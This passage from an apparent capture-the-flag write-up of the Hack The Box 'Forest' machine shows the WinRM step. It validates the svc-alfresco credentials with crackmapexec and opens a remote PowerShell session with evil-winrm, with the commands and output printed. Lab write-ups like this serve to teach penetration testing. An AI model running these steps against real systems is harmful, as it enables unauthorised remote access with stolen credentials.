Port 5985 - Winrm

Let's check if we have access through winrm.

└─$ crackmapexec winrm -u "svc-alfresco" -p "s3rvice"  
SMB    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP    5985   FOREST           [*]
WINRM    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

And we can exploit it. So, lets get the shell.

└─$ evil-winrm -i -u "svc-alfresco" -p "s3rvice" 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

Last updated